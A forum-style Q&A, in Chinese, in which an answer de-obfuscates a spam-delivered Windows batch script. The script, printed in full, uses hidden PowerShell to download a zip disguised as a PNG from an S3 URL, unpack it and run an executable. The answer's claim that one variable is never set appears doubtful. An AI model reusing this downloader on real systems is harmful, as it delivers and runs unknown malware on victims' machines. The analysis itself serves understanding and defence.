问题描述
我通过垃圾邮件收到了这个程序,但我不知道如果我执行它会做什么。
虽然我使用 macOS 并且知道它不会损害我的机器,但我很确定它是病毒,所以我想了解它。
我的猜测是它将字符的值更改为其他字符以使其不可读。
cls
@echo off
setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
set len=3
set charpool=0123456789abcdefghijlmnopqrstuvxz
set len_charpool=16
set NHCf_bQIkNU_N_DE__KlMM_YNchRbY=
for /L %%b IN (1,1,%len%) do (
set /A rnd_index=!RANDOM! * %len_charpool% / 32768
for /F %%i in ('echo %%charpool:~!rnd_index!^,1%%') do set NHCf_bQIkNU_N_DE__KlMM_YNchRbY=!NHCf_bQIkNU_N_DE__KlMM_YNchRbY!%%i
)
set ZdHy_v_fyF=a
set ZgGEYqErM___uhIAWjNJ=b
set P__JXjQl____B_zA=c
set Cnj_NdJ=d
set XivmzFFG___rc_I=e
set MGE_Jp_yjrnuydCY__zWudMUmm__A=f
set ICMPRKHvGxGlqYbvqU=g
set CnNaDuPWL__aCJbmYawO_XjI_yQ=h
set Yq_cgTV___OgMaat_VfP=i
set MJcfRtoeVwMDZ=j
set IyypGJJHieiPDkK_VvH_kWaBDADfU=k
set ST__sVoOCkBtOSu_HC=l
set DqJ_t_keWA_uetGRNsrgZCelOIQ=m
set Bpnnp_SNZcQBiJN=n
set MMvmaGXgBQ_nHZ=o
set EuxpUwQe_bUWbrg_KQ=p
set OOhhHfJZYpK_Y=q
set OQLPyY=r
set ZmWecoFDM=s
set LHJiJU=t
set SbVCD=u
set DrxJWqvnnMzGPCWhMQ=v
set XfyZEmN_UzM_tAlI=w
set IDHE_R=x
set I_Ohy_MOkJQDcatjk_pX=y
set LFgTA_NYO_YBpU=z
set AfyLB_hDkohaG=0
set Bi__eZ_rqfjZTdY_QJ_W_nuNKFMkVFM=1
set SRW_ft_avO_FuMY=2
set Y_A_q_TYWVQbqF_qQ__ncLfolUsDI=3
set IBuFjVvfpcx_f_yYNCj_cZjJczmV=4
set ZcDjFcQHZ_zMIALohJYzEBILhH=5
set LHaI_YWR_Yr_xdGET__s_ChnMfJTMC=6
set FtOBCHc__YEKXfREpPT__xqKJStxdZS=7
set YddJGsUdIcc_HF=8
set EsTG_b_ew_TaPO=9
set ghdt2d= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set S_p_BzRKgYKgQ_KCn_LF= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set LEG_bBk_Nyos_T= %s_p_BzRKgYKgQ_KCn_LF%
set DlnV_YXDe_ov_hczSaG_lUoz_T_YnN=%Programdata%\--___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2=%Programdata%\T__aB__VtZ_CAgauukskJ_oFeEW_fG
IF EXIST %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2% GOTO FIM
mkdir %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2%
IF EXIST %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN% GOTO FIM
mkdir %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%
set Dl_pgTsLKvB_YUzB_quExlvqy_jMpO=%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%s_p_BzRKgYKgQ_KCn_LF%.zip
set S_GnTbYypHUDTs_ZLgau_Mdi_B__kG = "%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump.dmp"
set RRCkcy_jdqfrz_lqSpedbgI_jj_i_D= "%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump2.exe"
set dado1="http"
set dado2="s://corni43uuy.s3"
set dado3="-eu-west-1.am"
set dado4="azonaws.com/image2.png"
powershell.exe -windowstyle hidden -Command "& {Import-Module BitsTransfer;Start-BitsTransfer ('%dado1%%dado2%%dado3%%dado4%') '%Dl_pgTsLKvB_YUzB_quExlvqy_jMpO%';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('%Dl_pgTsLKvB_YUzB_quExlvqy_jMpO%');foreach($item in $zip.items()){$shell.Namespace('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump.dmp') -newname ('%s_p_BzRKgYKgQ_KCn_LF%.dmp');rename-item -path ('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump2.dmp') -newname ('%s_p_BzRKgYKgQ_KCn_LF%.exe');remove-item '%Dl_pgTsLKvB_YUzB_quExlvqy_jMpO%';Start-Sleep -s 5 ;start-process ('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%s_p_BzRKgYKgQ_KCn_LF%.exe')}"
解决方法
抱歉耽误了这么久。生活多次求情...
从第一个块开始:
set len=3
set charpool=0123456789abcdefghijlmnopqrstuvxz
set len_charpool=16
set NHCf_bQIkNU_N_DE__KlMM_YNchRbY=
for /L %%b IN (1,1,%len%) do (
set /A rnd_index=!RANDOM! * %len_charpool% / 32768
for /F %%i in ('echo %%charpool:~!rnd_index!^,1%%') do set NHCf_bQIkNU_N_DE__KlMM_YNchRbY=!NHCf_bQIkNU_N_DE__KlMM_YNchRbY!%%i
)
更改名称以免触发我们拥有的任何本地警报:
>type test.cmd
@setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
@set len=3
@set charpool=0123456789abcdefghijlmnopqrstuvxz
@set len_charpool=16
@set _altPool=
@for /L %%b IN (1,%len%) do @(
@set /A rnd_index=!RANDOM! * %len_charpool% / 32768
@for /F %%i in ('echo %%charpool:~!rnd_index!^,1%%') do @set _altPool=!_altPool!%%i
@echo _altPool == !_altPool!
)
>test.cmd
_altPool == 1
_altPool == 11
_altPool == 11a
>
因此它似乎在 NHCf_bQIkNU_N_DE__KlMM_YNchRbY 中生成三个随机字符。
第 12..47 行创建设置为小写 ASCII 字母数字字符的随机环境变量,但它们不在批处理脚本中的任何地方使用。它们可能只是一个糟糕的混淆尝试,或者它们可能会在以后被其他有效载荷使用,可能是为了避免检测的蹩脚尝试的熵行为。
#49 似乎是一种混淆。这里的 is 确实引用了 NHCf_bQIkNU_N_DE__KlMM_YNchRbY 中的三个字符,但脚本中从未使用过 ghdt2d。
set ghdt2d= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
紧接着是:
set S_p_BzRKgYKgQ_KCn_LF= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
然后在脚本中使用 S_p_BzRKgYKgQ_KCn_LF:
Find all "S_p_BzRKgYKgQ_KCn_LF"
File Untitled<1>
50 5:set S_p_BzRKgYKgQ_KCn_LF= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
51 22:set LEG_bBk_Nyos_T= %S_p_BzRKgYKgQ_KCn_LF%
58 70:set Dl_pgTsLKvB_YUzB_quExlvqy_jMpO=%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.zip
66 481:...T_YnN%\dump.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.dmp');rename-item -path ('%D... [line truncated]
66 586:..._YnN%\dump2.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.exe');remove-item '%Dl_pgTsL... [line truncated]
66 729:...V_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.exe')}" [line truncated]
Total found: 6
现在变得有趣了...
第 50..60 行似乎在设置路径/文件名变量时比脚本的其余部分更加混淆。
set S_p_BzRKgYKgQ_KCn_LF= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set LEG_bBk_Nyos_T= %S_p_BzRKgYKgQ_KCn_LF%
set DlnV_YXDe_ov_hczSaG_lUoz_T_YnN=%Programdata%\--___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2=%Programdata%\T__aB__VtZ_CAgauukskJ_oFeEW_fG
IF EXIST %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2% GOTO FIM
mkdir %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2%
IF EXIST %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN% GOTO FIM
mkdir %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%
set Dl_pgTsLKvB_YUzB_quExlvqy_jMpO=%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.zip
set S_GnTbYypHUDTs_ZLgau_Mdi_B__kG = "%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump.dmp"
set RRCkcy_jdqfrz_lqSpedbgI_jj_i_D= "%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump2.exe"
脚本中的 FIM 没有 goto 标签,因此如果这些文件系统对象存在,它们似乎是退出脚本的混淆方式。
更新后的测试脚本产生:
>type test.cmd
@setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
@set len=3
@set charpool=0123456789abcdefghijlmnopqrstuvxz
@set len_charpool=16
@set _entropy=
@for /L %%b IN (1,1%%') do @set _entropy=!_entropy!%%i
@echo _entropy == !_entropy!
)
set _zipFileName= --___--_%_entropy%
REM Obfuscation: set LEG_bBk_Nyos_T= %S_p_BzRKgYKgQ_KCn_LF%
set _zipFileDirectory=%Programdata%\--___--_%_entropy%
set _zipFileDirectory2=%Programdata%\T__aB__VtZ_CAgauukskJ_oFeEW_fG
@IF EXIST %_zipFileDirectory2% GOTO FIM
REM mkdir %_zipFileDirectory2%
@IF EXIST %_zipFileDirectory% GOTO FIM
REM mkdir %_zipFileDirectory%
set _zipPathFileName=%_zipFileDirectory%\%S_p_BzRKgYKgQ_KCn_LF%.zip
REM Ofbuscation: set S_GnTbYypHUDTs_ZLgau_Mdi_B__kG = "%_zipFileDirectory%\dump.dmp"
REM Obfuscation: set RRCkcy_jdqfrz_lqSpedbgI_jj_i_D= "%_zipFileDirectory%\dump2.exe"
set dado1="http"
set dado2="s://corni43uuy.s3"
set dado3="-eu-west-1.am"
set dado4="azonaws.com/image2.png"
REM powershell.exe -windowstyle hidden -Command "& {Import-Module BitsTransfer;Start-BitsTransfer ('%dado1%%dado2%%dado3%%dado4%') '%_zipPathFileName%';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('%_zipPathFileName%');foreach($item in $zip.items()){$shell.Namespace('%_zipFileDirectory%').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('%_zipFileDirectory%\dump.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.dmp');rename-item -path ('%_zipFileDirectory%\dump2.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.exe');remove-item '%_zipPathFileName%';Start-Sleep -s 5 ;Start-Process ('%_zipFileDirectory%\%S_p_BzRKgYKgQ_KCn_LF%.exe')}"
>test.cmd
_entropy == 4
_entropy == 45
_entropy == 45b
>set _zipFileName= --___--_45b
>REM Obfuscation: set LEG_bBk_Nyos_T=
>set _zipFileDirectory=C:\ProgramData\--___--_
>set _zipFileDirectory2=C:\ProgramData\T__aB__VtZ_CAgauukskJ_oFeEW_fG
>REM mkdir C:\ProgramData\T__aB__VtZ_CAgauukskJ_oFeEW_fG
>REM mkdir C:\ProgramData\--___--_
>set _zipPathFileName=C:\ProgramData\--___--_\.zip
>REM Ofbuscation: set S_GnTbYypHUDTs_ZLgau_Mdi_B__kG = "C:\ProgramData\--___--_\dump.dmp"
>REM Obfuscation: set RRCkcy_jdqfrz_lqSpedbgI_jj_i_D= "C:\ProgramData\--___--_\dump2.exe"
>set dado1="http"
>set dado2="s://corni43uuy.s3"
>set dado3="-eu-west-1.am"
>set dado4="azonaws.com/image2.png"
>REM powershell.exe -windowstyle hidden -Command "& {Import-Module BitsTransfer;Start-BitsTransfer ('"http""s://corni43uuy.s3""-eu-west-1.am""azonaws.com/image2.png"') 'C:\ProgramData\--___--_\.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\--___--_\.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\--___--_').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\--___--_\dump.dmp') -newname ('.dmp');rename-item -path ('C:\ProgramData\--___--_\dump2.dmp') -newname ('.exe');remove-item 'C:\ProgramData\--___--_\.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\--___--_\.exe')}"
>
只留下最后的 PS 调用,它可以重新格式化为这样的:
{
Import-Module BitsTransfer;
Start-BitsTransfer ('%dado1%%dado2%%dado3%%dado4%') '%_zipPathFileName%';
Start-Sleep -s 5 ;
$shell = new-object -com shell.application;$zip = $shell.NameSpace('%_zipPathFileName%');
foreach($item in $zip.items())
{
$shell.Namespace('%_zipFileDirectory%').copyhere($item);
};
Start-Sleep -s 5 ;
rename-item -path ('%_zipFileDirectory%\dump.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.dmp');
rename-item -path ('%_zipFileDirectory%\dump2.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.exe');
remove-item '%_zipPathFileName%';
Start-Sleep -s 5 ;
Start-Process ('%_zipFileDirectory%\%S_p_BzRKgYKgQ_KCn_LF%.exe')
}
剩余的一个原始变量 S_p_BzRKgYKgQ_KCn_LF 永远不会被脚本设置,因此它将为空。我怀疑这个脚本没有按预期工作。但目的似乎是浪费我们的时间分析它,或者可能下载并执行某些内容。如果无法访问图像文件,就不可能确切知道它的用途。
https://corni43uuy.s3-eu-west-1.amazonaws.com/image2.png 处的引用图像文件不再可用:
<Error>
<Code>AllAccessDisabled</Code>
<Message>All access to this object has been disabled</Message>
<RequestId>F6D9EB7F64EA04A4</RequestId>
<HostId>WCiK2wokFJup1kWVnCRqVX43sM2NPLFeuU/WnJ1PK4uqZvo1IhH0ppgn9o4nGxX2158jqsPw+wQ=</HostId>
</Error>
Google 没有提供对该链接的任何引用。